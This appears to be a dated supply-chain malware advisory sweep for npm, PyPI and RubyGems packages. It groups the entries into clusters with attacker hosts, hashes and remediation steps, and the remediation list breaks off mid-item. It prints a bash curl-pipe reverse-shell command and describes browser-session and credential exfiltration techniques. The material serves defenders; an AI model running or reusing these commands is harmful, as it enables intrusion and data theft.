GitHub Advisory malware sweep - 2026-09-23 (late) + 2026-09-24 (npm `@baanx/*` + `@insiderintelligence/componentlibrary` `oob.algamil7x.xyz` DNS-OOB day 7; `@rixxcodex/baileys` + `sea-baileys` Baileys-wave WhatsApp session-hijack extension; `pino-testkit` chai/pino/jsonspack family Function-constructor RCE; `vite-dev-launcher` `~/.gradle/caches/` sibling of yesterday`s `@vitemirrorte` mall4cloud-react RAT; pip `memoryos` maintainer-compromise infostealer + npm `@memtensor/memos-cloud-openclaw-plugin` openclaw plugin; `internallib_v657` + `internallib_v463` RFC1918 `10.0.73.186:443` curl-pipe reverse shell (new subnet vs v497/v550 `10.0.5.109`); `godzz`/`godzzz` Cloudflare-Worker + Groq API key exfil siblings; `com.apple.unityplugin.storekit` + `simplenewnpmpackage` shared `dapnhid534ch...oast.fun` recon beacons; `a-onesite`, `event-hunter`, `helpersutils-dev-tools` beacon-only probes; `hachutis` undeclared-binary trycloudflare tunnel; rubygems `wurl_show_data`)
GHSA 2026-09-23 (late) + 2026-09-24: ~25 new npm advisories + 1 pip + 1 rubygems. Day 7 of the oob.algamil7x.xyz DNS-OOB operator adds @baanx/common, @baanx/domain, and @insiderintelligence/componentlibrary. vite-dev-launcher@2.9.4 is a mall4cloud-react-RAT sibling of yesterdays @vitemirrorte. internallib_v657/v463` reverse shell to a new RFC1918 subnet.
- Incident type
- Advisory sweep. A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
- Detected by
- GitHub Advisory Database · OpenSSF malicious-packages · OpenSSF Package Analysis · Amazon Inspector · Safedep · kam193/bad-packages · jaschadub/compromised-packages-check
- Also known as
- 2026-09-24 GHSA npm sweep · @baanx + @insiderintelligence algamil7x.xyz day 7 · @rixxcodex/baileys + sea-baileys WhatsApp session hijack · pino-testkit chai/pino/jsonspack family extension · vite-dev-launcher mall4cloud-react RAT sibling · memoryos PyPI maintainer compromise (2026-09-compr-memoryos) · internallib_v657 + internallib_v463 new-subnet reverse shell · godzz + godzzz Cloudflare Worker + Groq API key exfil · hachutis undeclared-binary trycloudflare tunnel
- Ecosystems
- npmPyPIRubyGems
- Packages tracked
- 20
What happened
Between roughly 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC, GitHub Advisory Database (plus the OpenSSF malicious-packages bulk export, Amazon Inspectors IN-MAL feed, and Safedeps compromised-package tracker) published approximately 25 new npm malware advisories, 1 pip advisory, and 1 rubygems advisory. The window is dominated by day-7 continuation of the oob.algamil7x.xyz DNS-OOB operator, a Baileys-wave WhatsApp session-hijack extension, a chai/pino/jsonspack family pivot from chai-lures to pino-lures (pino-testkit), a mall4cloud-react-RAT sibling of yesterdays @vitemirrorte (vite-dev-launcher), one legitimate-maintainer PyPI account compromise (memoryos), and two internallib_v*` variants pointing at a new RFC1918 subnet.
Cluster A - @baanx/* + @insiderintelligence/componentlibrary oob.algamil7x.xyz DNS-OOB (day 7)
| Package | GHSA | Status |
|---|---|---|
@baanx/common | GHSA-27jh-hjhg-vg2p | New addition |
@baanx/domain | GHSA-qhfc-6rp6-pwv6 | New addition |
@insiderintelligence/componentlibrary | GHSA-rjh6-qm48-cg84 | New addition |
@baanx/blockchain-config | GHSA-f67m-pjx9-96cv | Secondary advisory (already catalogued 2026-09-22 sweep) |
@baanx/abis | GHSA-598m-93qh-82f9 | Secondary advisory (already catalogued 2026-09-22 sweep) |
@baanx/solana-lib | GHSA-5x34-3xqm-3r73 | Secondary advisory (already catalogued 2026-09-21 sweep) |
@insiderintelligence/googleadmanager | GHSA-q699-336h-g385 | Secondary advisory (already catalogued 2026-09-19 sweep) |
The three new adds continue the operators scope-per-day cadence (day 2 introduced @insiderintelligence/googleadmanager, day 5 introduced the @baanx/ scope with abis/blockchain-config, day 6 pivoted to @tvg-mar and @user-services, and today day 7 fills in two more @baanx/ variants and a new @insiderintelligence/componentlibrary`). GHSA bodies on the 2026-09-24 additions are CWE-506 boilerplate ("any computer that has this package installed should be considered fully compromised") but the scope, publish cadence, and operator continuity across nine days make the attribution unambiguous.
The operator now spans nine consecutive days (day 1: 2026-09-18 @tink/tink-link-core; day 7: 2026-09-24), all under the same oob.algamil7x.xyz DNS zone, same install-script primitive (scripts.install: node index.js → runtime/support/telemetry/probe/impl.js → module.constructor._load to bypass literal require(), String.fromCharCode hex-array obfuscation of destination and prefix), and same DNS-resolution exfil format (<prefix>-<user>-<host>-<cwd>.<ts>.oob.algamil7x.xyz). This is now the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus.
Cluster B - Baileys-wave WhatsApp session-hijack extension
| Package | Version | GHSA | Primitive |
|---|---|---|---|
@rixxcodex/baileys | 8.0.15/8.0.16/8.1.0/8.2.0 | GHSA-fjxf-mv8f-cp6x | Three undocumented channels + unpinned @rixxcodex/libsignal GitHub HEAD RCE |
sea-baileys | 1.0.2 | GHSA-9xjg-g5r3-xpj8 | libsignal remapped to @otaxayun/libsignal-node@latest (mutable tag) + newsletter JID injection |
@rixxcodex/baileys is a fork of the legitimate @whiskeysockets/baileys WhatsApp Web API library with three undocumented channelMetadata channels wired into the auth flow. The channel handlers pull remote configuration from GitHub raw JSON:
raw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.jsonraw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json
At runtime the channels use the installer`s authenticated WhatsApp session to perform whatever account actions the operator has configured in the JSON. The operator can add or remove actions live without republishing the npm package. skyzopedia is the same GitHub account seen in the 2026-09-19 @sanzoffc/baileys day-4 wave (raw.githubusercontent.com/skyzopedia/NewsletterID/*) - confirming a continuous Baileys-adjacent operator across at least 6 days.
Additionally the package.json declares @rixxcodex/libsignal as an unpinned github:rixxcodex/libsignal reference (no tag, no commit hash). Every install re-fetches whatever code is at GitHub HEAD, which means the operator has a live RCE channel inside the Signal encryption path without republishing the npm package.
sea-baileys@1.0.2 remaps the legitimate libsignal import to @otaxayun/libsignal-node@latest. The latest dist-tag is mutable, so the operator can push a fresh RCE at any time and it lands on every subsequent npm install. The routed data includes:
- Signal Protocol identity private key
- Signed pre-key private key
- Session records
- Sender keys
Separately, the library unconditionally attaches a hardcoded annotations block referencing newsletter JID 120363409928671192@newsletter to every outgoing media message - silent WhatsApp-message tampering distinct from the credential exfil.
Cluster C - pino-testkit chai/pino/jsonspack family Function-constructor RCE
pino-testkit@10.4.5 (GHSA-q57p-68r4-fj72). Impersonates the legitimate pino logging library end-to-end:
authorfield lists Matteo Collina (pino`s actual creator)contributorslist mirrors pino`s real maintainer list- README copied from pino with name substitutions only
The payload uses character-substitution + Fisher-Yates-style shuffle to reconstruct the string Function at runtime, then executes dynamically-constructed code via the Function constructor. Hoists require and module to global scope so any subsequent code can dynamically load any module.
Family context: this is the same operator arc as chai-tracker (2026-08-10), chai-testing (2026-09-21), chai-as-viem + chai-logger (2026-09-22 in yesterdays sweep). The pattern is a testing/logging library lure name → obfuscated Function-constructor RCE at import-time → real maintainer names as camouflage. Today marks the operators pivot from chai-plugin lures to pino-plugin lures under the same primitive.
Cluster D - vite-dev-launcher mall4cloud-react-RAT sibling
vite-dev-launcher@2.9.4 (GHSA-pg2r-jxrr-mx5j). Triple-trigger payload: postinstall hook + direct require() + CLI invocation. Payload is base64 + AES-256-GCM + XOR obfuscated and only decrypts when the current workspace fingerprints match hardcoded file hashes (targeted repository lock so the malware stays dormant in sandboxes and generic dev environments).
Once active, the payload reconstructs a full C2 endpoint set at runtime:
- Agent registration
- Task polling
- Result submission
- File transfer
Persistence path is ~/.gradle/caches/transforms-3/8.7/instrumented/... disguised as a legitimate Gradle instrumentation artifact.
This is the same primitive as yesterdays @vitemirrorte/element-plus-vite-cli@2.9.1` (Cluster G of the 2026-09-23 sweep) - same ~/.gradle/caches/ persistence, same workspace-hash-gated activation, same C2 opcode set. Treat as the same operator running a fresh scope name. Yesterdays C2 domain was npmjs.it.com; todays advisory redacts the C2 host but the code path and infrastructure pattern are otherwise identical.
Cluster E - memoryos PyPI maintainer compromise + @memtensor/memos-cloud-openclaw-plugin npm
| Package | Version | GHSA | Campaign |
|---|---|---|---|
memoryos (pip) | 2.0.34 | GHSA-hxf9-rvj5-h45h | 2026-09-compr-memoryos |
@memtensor/memos-cloud-openclaw-plugin (npm) | 0.1.21/0.1.23/0.1.25 | GHSA-mhjf-v53x-7p87 | (unassigned) |
memoryos@2.0.34 is a maintainer-account compromise of a legitimate PyPI package (MemoryOS is a memory-augmented AI framework with prior legitimate releases). The compromised version publishes with "clearly malicious intent, like infostealers" per Safedeps classification. VirusTotal detection is available. This is *not* a supply-chain injection or a typosquat - it is the same package name published by an attacker who took over the maintainer account. Anyone who ran pip install memoryos==2.0.34` between publish and yank installed the infostealer.
@memtensor/memos-cloud-openclaw-plugin (npm, three versions from Sept 23) - the -openclaw-plugin suffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both packages target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; the coordinated attention on that specific ecosystem is worth flagging even though the underlying operators may differ.
Cluster F - internallib_v* enumeration extension (new RFC1918 subnet)
| Package | Version | GHSA | Reverse-shell target |
|---|---|---|---|
internallib_v657 | 1.0.1 | GHSA-w2wx-86qr-g533 | 10.0.73.186:443 |
internallib_v463 | 1.0.2 | GHSA-gv94-v8fj-f45c | 10.0.73.186:443 (via reverse-shell.sh) |
internallib_v497 (re-issue) | (existing) | GHSA-94q5-67r5-mwjx | Already catalogued as GHSA-m9ww-2r6q-x632 in 2026-09-23 sweep - not re-added |
Both new packages export a command() function that runs "/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'" - the same reverse-shell.sh curl-pipe primitive as prior internallib_v* versions, but pointed at a new RFC1918 target: 10.0.73.186:443 (previous versions catalogued through 2026-09-23 all pointed at 10.0.5.109). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some internallib_v* packages earlier in the campaign.
Continuation of the internallib_v<NNN> sequential-enumeration campaign tracked since 2026-08-03. The new subnet suggests the operator is either testing against multiple internal networks or has pivoted to a new engagement.
Cluster G - godzz + godzzz Cloudflare-Worker + Groq API-key exfil
| Package | Version | GHSA | Behaviour |
|---|---|---|---|
godzz | 1.0.0 | GHSA-p6cq-66pp-9r5g | Disables TLS validation globally; scrapes Chromium CDP 127.0.0.1:9222; exfils to ai-script.test0ing7.workers.dev; distributes bundled Groq API key |
godzzz | 1.0.0 | GHSA-6j9r-v67w-r8w4 | cdp_inject.js host-info + file-read + base64 + HTTP POST exfil |
godzz is the more detailed of the pair. On load:
process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0"(disables TLS certificate validation for the entire Node process, which persists for the process lifetime)- Connects to the local Chromium DevTools Protocol endpoint at
127.0.0.1:9222- this is the well-known DevTools debug port and any developer running Chromium with--remote-debugging-port=9222(or the default for Puppeteer/Playwright dev workflows) is exposing all active browser sessions - Extracts active page content and active editor text from every open Chromium page
- Base64-encodes the harvested data and POSTs to the operator
s Cloudflare Worker atai-script.test0ing7.workers.dev`
Additionally the package ships an embedded Groq API key (gsk_... prefix) that is distributed to every installer. The operator built a redistribution vector for their own Groq quota - anyone who uses the package inherits the operators bundled key and any prompts the operator has embedded run under the operators tenant. This is unusual and worth flagging as a new lateral pattern.
godzzz ships a cdp_inject.js file with the same host-info + file-read + credential-exfil shape (reads process.env.USER, fs.readFileSync/fs.existsSync for local files, base64 encoding, https.request/http.get POSTs). Sibling relationship to godzz is inferred from name, purpose, and same-day publish.
Cluster H - Shared-domain recon beacons
| Package | Version | GHSA | Beacon target |
|---|---|---|---|
com.apple.unityplugin.storekit | 1.0.2 | GHSA-6r46-f382-x53p | dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun (Interactsh) |
simplenewnpmpackage | 1.0.2 | GHSA-mr2p-c47m-85w8 | dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun (same subdomain) |
a-onesite | 99.9.9 | GHSA-9j7m-m3w9-mgrc | http://eoy34oyrep9j5x8.m.pipedream.net (unencrypted HTTP wget) |
event-hunter | 1.0.0 | GHSA-wwrq-gcqx-rx6p | https://estimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64> |
helpersutils-dev-tools | 1.0.11 | GHSA-w43w-f8m4-5r39 | http://5.189.173.113:8899/csp-edu + /csp (direct-IP HTTP) |
The first two packages (com.apple.unityplugin.storekit and simplenewnpmpackage) beacon to the exact same Interactsh subdomain - one operator running two lures against the same OOB listener. The com.apple.unityplugin.storekit name is a plausible internal-name dep-confusion lure (Apple/Unity StoreKit integration), the simplenewnpmpackage name is a "how far can I get with the most obvious name" test.
a-onesite@99.9.9 uses the sentinel 99.9.9 dep-confusion version marker with unencrypted-HTTP wget to a Pipedream endpoint (the operator gets a dashboard of every install). event-hunter self-labels as a "Dependency Confusion to RCE proof-of-concept" and uses an ngrok tunnel. helpersutils-dev-tools beacons to a fixed IP:port with two paths (/csp-edu, /csp) suggesting a bucketing or campaign-tagging scheme.
All five are recon-only (no secret material exfiltrated beyond hostname/platform/OS-username/domain), but the fact that so many independent dep-confusion probes are landing in the same 48-hour window is worth flagging as an ecosystem-wide indicator of active internal-registry attention.
Cluster I - hachutis undeclared-binary trycloudflare tunnel
hachutis@1.0.0/1.0.6 (GHSA-9rj9-xh7c-qqh8). Ships three prebuilt executables under bin/:
bin/clibin/cli-linux-amd64bin/cli-http-linux
None of these are declared in the package.json bin field or the files field. Legitimate-looking JavaScript serves as decoy for the opaque native payloads. When run, the binaries open a channel from the installers host to a Cloudflare Tunnel operator-controlled endpoint at already-query-bacteria-agreed.trycloudflare.com`.
Binary hash: 455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9. Same architectural class as the bytepack-probe-a7x3 transitive-dep pattern from 2026-09-22 - malicious functionality hidden in non-declared files rather than the exported API.
Cluster J - rubygems wurl_show_data OSSF-flagged malware
wurl_show_data@3.1.42.99 (GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged the version as executing commands associated with malicious behavior. No further analysis published. Package hash 17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d. Treat as install-time compromise pending IOC publication.
Cross-operator patterns worth flagging
- The
oob.algamil7x.xyzoperator is on day 7 (day 1 was 2026-09-18@tink/tink-link-core) - nine consecutive days with a fresh internal-lookalike scope each day but the same DNS zone, code style, and primitive. Still the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus. - The
~/.gradle/caches/persistence + workspace-hash-gated activation class is now confirmed across at least two operator scopes (@vitemirrorteyesterday,vite-dev-launchertoday). Any Vite/Vue/React-plugin-adjacent lure that ships aninstall/postinstallscript and touches~/.gradle/caches/should be treated as a member of this family. - The chai/pino/jsonspack Function-constructor RCE arc has pivoted from chai-plugin lures to pino-plugin lures under the same primitive.
pino-testkittoday extendschai-tracker(Aug 10) →chai-testing(Sep 21) →chai-as-viem/chai-logger(Sep 22). Expect morepino-*variants to surface. - The Baileys wave now spans at least three operator identities (
@sanzoffc/baileysday 4 on Sep 19,@rixxcodex/baileystoday with the sameskyzopediaGitHub raw endpoints,sea-baileystoday with a different unpinned-libsignal primitive). Any Baileys wrapper from an unfamiliar scope should be treated as suspect. - *The `internallib_v
enumeration campaign has pivoted subnet** from10.0.5.109to10.0.73.186` on 2026-09-23. Two subnets means two engagements or two operator infrastructure sets - review your CI network egress logs for either subnet. - Legitimate-maintainer PyPI account compromises are back with
memoryos@2.0.34. This class of incident is distinct from typosquats and dep-confusion probes - the package name is real, the prior versions are legitimate, and the compromised version passes any name-based allowlist. Version-pinning is the mitigation.
Registry state
All packages in Clusters A, C, D, E, F, G, H, I, J are npm/pip/rubygems-quarantined (replaced with holding packages). Cluster Bs Baileys packages appear to still be live at the time of writing given the age of the versions (@rixxcodex/baileys@8.2.0 is only a few days old). C2 infrastructure remains active in every cluster: oob.algamil7x.xyz, skyzopedia/* GitHub raw endpoints, npmjs.it.com (from yesterdays @vitemirrorte), test0ing7.workers.dev, dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun, eoy34oyrep9j5x8.m.pipedream.net, estimator-nemeses-unwatched.ngrok-free.dev, 5.189.173.113, already-query-bacteria-agreed.trycloudflare.com, 10.0.73.186, 10.0.5.109.
Discovery credits
GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis, Amazon Inspector, Safedep, kam193/bad-packages, jaschadub/compromised-packages-check. Per-package IOC details drawn from GHSA and OpenSSF advisory bodies published between 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC.
Affected packages (20)
- npm@baanx/common9.9.11
- npm@baanx/domain9.9.11
- npm@insiderintelligence/componentlibrary9.9.10
- npm@memtensor/memos-cloud-openclaw-plugin0.1.210.1.230.1.25
- npm@rixxcodex/baileys8.0.158.0.168.1.08.2.0
- npma-onesite99.9.9
- npmcom.apple.unityplugin.storekit1.0.2
- npmevent-hunter1.0.0
- npmgodzz1.0.0
- npmgodzzz1.0.0
- npmhachutis1.0.01.0.6
- npmhelpersutils-dev-tools1.0.11
- npminternallib_v4631.0.2
- npminternallib_v6571.0.1
- PyPImemoryos2.0.34
- npmpino-testkit10.4.5
- npmsea-baileys1.0.2
- npmsimplenewnpmpackage1.0.2
- npmvite-dev-launcher2.9.4
- RubyGemswurl_show_data3.1.42.99
These are usually pulled in as transitive dependencies rather than installed directly. Check your whole tree at once - it runs in your browser and nothing is uploaded.
Impact
- *Cluster A - npm `@baanx/
+@insiderintelligence/componentlibraryoob.algamil7x.xyzDNS-OOB (day 7 of the operator)**:@baanx/common(GHSA-27jh-hjhg-vg2p),@baanx/domain(GHSA-qhfc-6rp6-pwv6), and@insiderintelligence/componentlibrary(GHSA-rjh6-qm48-cg84) - all three published 2026-09-24 as fresh additions to the@baanx/and@insiderintelligence/scopes the operator has been iterating since day 2 (2026-09-19). GHSA bodies are CWE-506 boilerplate on the 2026-09-24 additions but the scope, publish cadence, and operator continuity make the attribution unambiguous. Also on 2026-09-24: additional GHSA numbers reissued against@baanx/blockchain-config(GHSA-f67m-pjx9-96cv),@baanx/abis(GHSA-598m-93qh-82f9),@baanx/solana-lib(GHSA-5x34-3xqm-3r73), and@insiderintelligence/googleadmanager(GHSA-q699-336h-g385) - these are secondary advisory records for packages already catalogued in the [2026-09-19](/incident/multi-2026-09-19-ghsa-malware-sweep) (day 2) and [2026-09-22](/incident/multi-2026-09-22-ghsa-malware-sweep) (day 5) sweeps, and do not represent new drops. The operator is now on a nine-consecutive-day run with the same DNS zone, same install-script primitive (module.constructor._loadto defeat static analysis,String.fromCharCode` hex-array obfuscation of destination), and fresh scope names each day - Cluster B - npm Baileys-wave WhatsApp session-hijack extension:
@rixxcodex/baileys@8.0.15/8.0.16/8.1.0/8.2.0(GHSA-fjxf-mv8f-cp6x) - WhatsApp library fork with three undocumented channels that use the installers authenticated WhatsApp session to perform account actions chosen by the author at runtime; remote configuration lists pulled fromraw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.jsonandraw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json(sameskyzopediaGitHub account seen in the 2026-09-19@sanzoffc/baileysday-4 wave), and an unpinned dependency on@rixxcodex/libsignalvia GitHubHEADthat executes arbitrary code within the Signal encryption path with no integrity check.sea-baileys@1.0.2(GHSA-9xjg-g5r3-xpj8) - remapslibsignalto@otaxayun/libsignal-node@latest(mutable tag - operator can push a fresh RCE at any time) which routes the installers Signal Protocol identity private key, signed pre-key private key, session records, and sender keys through an uncontrolled third-party dep; also unconditionally attaches a hardcoded newsletter JID120363409928671192@newsletterannotation to every outgoing media message - Cluster C - npm
pino-testkitchai/pino/jsonspack family Function-constructor RCE (extension of the family tracked since Aug):pino-testkit@10.4.5(GHSA-q57p-68r4-fj72). Impersonates the legitimatepinologging library end-to-end: lists Matteo Collina (pinos real creator) as author and actual pino maintainers as contributors, and copies pinos README verbatim with name substitutions. Payload uses character substitution and a Fisher-Yates-style shuffle to reconstruct the stringFunction, then executes dynamically-constructed code via theFunctionconstructor. Hoistsrequireandmoduleto global scope to enable arbitrary module loading. Same author-fingerprinting + pino-cover-story + Function-constructor pattern aschai-logger@3.0.2catalogued in yesterdays sweep andchai-testing/chai-tracker/chai-as-viem` earlier in the arc. The operator has now pivoted from chai-plugin lures to pino-plugin lures under the same primitive - Cluster D - npm
vite-dev-launchermall4cloud-react-RAT sibling (~/.gradle/caches/persistence, same operator as yesterdays@vitemirrorte`):vite-dev-launcher@2.9.4(GHSA-pg2r-jxrr-mx5j). Postinstall hook + directrequire()+ CLI invocation all trigger the payload. Payload is AES-256-GCM + XOR-obfuscated and only decrypts when workspace file hashes match hardcoded values (targeted repository fingerprinting to evade sandbox analysis). C2 endpoint set (agent register, task poll, result submit, file transfer) reconstructed at runtime from base64. Persistence path is~/.gradle/caches/transforms-3/8.7/instrumented/...- identical directory pattern to yesterdays@vitemirrorte/element-plus-vite-cli@2.9.1` which lodges into~/.gradle/caches/, targets workspacemall4cloud-react, and beacons tonpmjs.it.com. Treat as the same operator running a fresh scope; block the same C2 posture. Any developer who rannpm install vite-dev-launcheron amall4cloud-reactfork on 2026-09-23/24 has an active persistent implant - Cluster E - pip
memoryosmaintainer-account compromise infostealer + npm@memtensor/memos-cloud-openclaw-pluginopenclaw plugin: pipmemoryos@2.0.34(GHSA-hxf9-rvj5-h45h, campaign2026-09-compr-memoryos) - not a supply-chain injection but an account compromise of the MemoryOS PyPI maintainer, with the compromised version publishing "clearly malicious intent, like infostealers" (Safedep classification). VirusTotal detection available. npm@memtensor/memos-cloud-openclaw-plugin@0.1.21/0.1.23/0.1.25(GHSA-mhjf-v53x-7p87) - the-openclaw-pluginsuffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; treat as coordinated attention on that specific project - *Cluster F - npm `internallib_v
enumeration extension (new RFC1918 subnet)**:internallib_v657@1.0.1(GHSA-w2wx-86qr-g533) andinternallib_v463@1.0.2(GHSA-gv94-v8fj-f45c). Both export acommand()function that runs"/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'"- the same reverse-shell.sh curl-pipe primitive as priorinternallib_v` versions, but pointed at a new RFC1918 target:10.0.73.186:443(previous versions catalogued through 2026-09-23 all pointed at10.0.5.109). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some `internallib_vpackages earlier in the campaign. Continuation of theinternallib_v<NNN>sequential-enumeration campaign tracked since 2026-08-03 (previous versions catalogued:_v497,_v514,_v524,_v550,_v568,_v688,_v756,_v902,_v949). Also on 2026-09-24:internallib_v497gets a secondary GHSA-94q5-67r5-mwjx (already catalogued asGHSA-m9ww-2r6q-x632` in the 2026-09-23 sweep - this sweep does not re-add it). The new subnet suggests the operator is testing against multiple internal networks or pivoting to a new engagement - Cluster G - npm
godzz/godzzzCloudflare-Worker + Groq API key exfil siblings:godzz@1.0.0(GHSA-p6cq-66pp-9r5g) - setsprocess.env.NODE_TLS_REJECT_UNAUTHORIZED = "0"on load (disables TLS certificate validation for the entire Node process), connects to the local Chromium DevTools Protocol endpoint at127.0.0.1:9222to extract active page content and editor text, base64-encodes the harvested data, and exfiltrates it to a Cloudflare Worker atai-script.test0ing7.workers.dev. Ships an embedded Groq API key (gsk_...) that is redistributed to all installers - if an installer uses the package, they inherit the operators Groq quota and any prompts the operator has embedded run under their tenant.godzzz@1.0.0(GHSA-6j9r-v67w-r8w4) - sibling package with acdp_inject.jsfile that readsprocess.env.USERand files viafs.readFileSync/fs.existsSync, base64-encodes, and POSTs viahttps.request/http.get`. Same host-info/credential-exfil stager shape. The two-package variant and identical primary purpose suggest one operator publishing under two names - Cluster H - npm shared-domain recon beacons (dependency-confusion / reconnaissance):
com.apple.unityplugin.storekit@1.0.2(GHSA-6r46-f382-x53p) - impersonates an Apple/Unity StoreKit internal namespace, falsely claims authorship byApple, Inc; on module load issues an HTTPS GET todapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun(Project Discovery Interactsh) transmitting package name, OS platform, hostname as query params.simplenewnpmpackage@1.0.2(GHSA-mr2p-c47m-85w8) - shares the exact samedapnhid534ch06s9vpm0mbg1httu5gytc.oast.funsubdomain ascom.apple.unityplugin.storekit; on load beacons platform + hostname to the same URL. One operator running multiple lures against the same Interactsh listener.a-onesite@99.9.9(GHSA-9j7m-m3w9-mgrc) - preinstall/preupdate/test scripts allwgethttp://eoy34oyrep9j5x8.m.pipedream.netwith username, cwd, hostname over unencrypted HTTP; sentinel99.9.9classic dep-confusion attention-getter.event-hunter@1.0.0(GHSA-wwrq-gcqx-rx6p) - self-labelled "Dependency Confusion to RCE proof-of-concept"; ngrok tunnelestimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64>receivesos.hostname()+ timestamp.helpersutils-dev-tools@1.0.11(GHSA-w43w-f8m4-5r39) - direct-IP beacon tohttp://5.189.173.113:8899/csp-eduand/cspon load; siblingbypass.jsfile carries the identical beacon - Cluster I - npm
hachutisundeclared-binary trycloudflare tunnel:hachutis@1.0.0/1.0.6(GHSA-9rj9-xh7c-qqh8). Ships three undeclared prebuilt executables underbin/:bin/cli,bin/cli-linux-amd64,bin/cli-http-linux- not declared inpackage.jsonbin/filesand never installed as CLI shims, but present on disk in every install. Legitimate-looking JavaScript code serves as decoy for opaque native binaries. Running any of the binaries opens a channel from the installers host toalready-query-bacteria-agreed.trycloudflare.com(a Cloudflare Tunnel operator-controlled endpoint). Hash455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9` - Cluster J - rubygems
wurl_show_dataOSSF-flagged malware (payload not disclosed):wurl_show_data@3.1.42.99(GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged as executing commands associated with malicious behavior. No further analysis published. Hash17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d. Treat as install-time compromise pending IOC publication
What to do
- 1Grep every
package-lock.json,yarn.lock,pnpm-lock.yaml,package.json,requirements.txt,Pipfile.lock,poetry.lock, andGemfile.lockin your org for every package name in Clusters A through J. Uninstall on hit, wipenode_modules/.venv/vendor/, delete the lockfile, rebuild against a clean cache. Clusters B, C, D, E, F, G, H, and I all include confirmed real payloads (WhatsApp session hijack, Function-constructor RCE, targeted RAT with Gradle-cache persistence, infostealer, curl-pipe reverse shell, credential/API-key exfil, recon beacons, undeclared native binaries) - a hit on any of those is a compromise, not a warning - 2*For Cluster A (`@baanx/
+@insiderintelligence/` algamil7x day 7): keep theoob.algamil7x.xyzresolver block in place from prior days (this is now nine consecutive days from the same operator). The.xyzzone block is the durable mitigation because the operator picks a fresh internal-lookalike scope every 24 hours. Rotate any credential accessible from a host that install-ran any `@baanx/or@insiderintelligence/*` package in the last two weeks - 3For Cluster B (
@rixxcodex/baileys+sea-baileys): uninstall on hit and treat the associated WhatsApp session as fully compromised - revoke it in Linked Devices, reset the account password if you use one, review recent linked-device activity for unfamiliar sessions. Rotate any Signal identity keys if the package touched a real Signal or WhatsApp session. Block GitHub raw content requests toraw.githubusercontent.com/skyzopedia/*at CI egress. Any Baileys wrapper installed from an unfamiliar scope should be uninstalled and replaced with@whiskeysockets/baileysfrom the official maintainer - 4For Cluster C (
pino-testkitchai/pino/jsonspack family extension): audit anypinoorchaiplugin your projects import for author-metadata spoofing (real pino/chai maintainers listed as author/contributors on packages they never authored is a strong indicator).--ignore-scriptsdoes NOT block this family - the RCE fires when the module is loaded, not on install. Blockjsonspack.comat CI egress (same infrastructure as the chai-family; new lure name, same operator) - 5For Cluster D (
vite-dev-launchermall4cloud-react RAT sibling): blocknpmjs.it.comat your resolver AND at your web proxy (established C2 domain for this operator from yesterdays@vitemirrorteincident). If any developer or CI runner touched amall4cloud-reactfork in the last 72h and installedvite-dev-launcher,@vitemirrorte/element-plus-vite-cli, or any Vite-adjacent package under an unfamiliar scope, assume that workstation is fully compromised: image it, do not attempt in-place cleanup. Rotate every credential visible to the parent Node process (SSH keys, cloud tokens, git credentials, IDE tokens). Delete~/.gradle/caches/transforms-3/` on remediated hosts and rebuild Gradle from a known-clean source - 6For Cluster E (
memoryosPyPI +@memtensor/memos-cloud-openclaw-pluginnpm): uninstall on hit. Formemoryos, this is a maintainer-account compromise of a legitimate PyPI package - anyone who ranpip install memoryos==2.0.34between publish and yank has an infostealer already exfiltrated. Rotate all cloud provider access keys and IAM session tokens on any host that installed the version. Verify the current publishedmemoryosversion is from the legitimate maintainer, not a re-uploaded compromised version - 7For Cluster F (
internallib_v657+internallib_v463new-subnet reverse shell): block outbound HTTP to10.0.73.186AND10.0.5.109at CI network egress (both subnets are now confirmed operator infrastructure). Blockreverse-shell.shat CI egress (unencrypted-HTTP curl-pipe from install-time is the primitive). If your org runs anyinternallib_v<NNN>internal scope, the campaign has enumerated your version numbers now across two subnets - review your private-registry access logs for any public-npm resolution attempts against theinternallib_v*naming pattern - 8For Cluster G (
godzz/godzzzcredential exfil): uninstall on hit. If any developer installed either package, they have to (a) revoke and rotate any Groq API key the compromised process could have seen (the operators bundledgsk_...key is *distributed* by the malware but the local Groq key in.envor~/.config/groq/is also read), (b) close any open Chromium browser session that had DevTools Protocol enabled - the malware read active page content and editor text, so any authenticated session in the browser (SSO, email, cloud console) is exfiltrated, (c) blocktest0ing7.workers.devat your resolver. TheNODE_TLS_REJECT_UNAUTHORIZED=0` side-effect persists for the lifetime of any long-running Node process the package touched - 9For Cluster H (recon-only beacons): uninstall on hit. Rotate no credentials (these packages beacon platform + hostname only, no secret material). Block
